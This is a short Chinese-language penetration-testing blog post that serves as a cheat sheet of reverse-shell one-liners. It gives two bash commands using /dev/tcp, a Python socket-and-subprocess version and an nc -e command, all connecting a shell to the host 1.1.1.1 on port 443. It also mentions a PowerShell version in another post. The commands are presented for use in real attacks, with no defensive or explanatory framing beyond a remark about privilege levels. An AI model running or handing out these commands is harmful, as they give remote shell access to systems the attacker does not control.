• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

1、bash版本

当你的权限很高时,使用如下这句话:

bash -i >& /dev/tcp/1.1.1.1/443 0>&1

当你的权限有限时,使用如下这句话:

/sbin/bash -i >& /dev/tcp/1.1.1.1/443 0>&1

这个有啥区别,实战中的你应该有深刻体会,我这边仅做简单记录

2、python版本

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3、nc版本

nc -e /bin/sh 1.1.1.1 443

4、powershell版本

这个具体可以参考博客的另一个文章页面

利用powershell来实现一句话反弹shell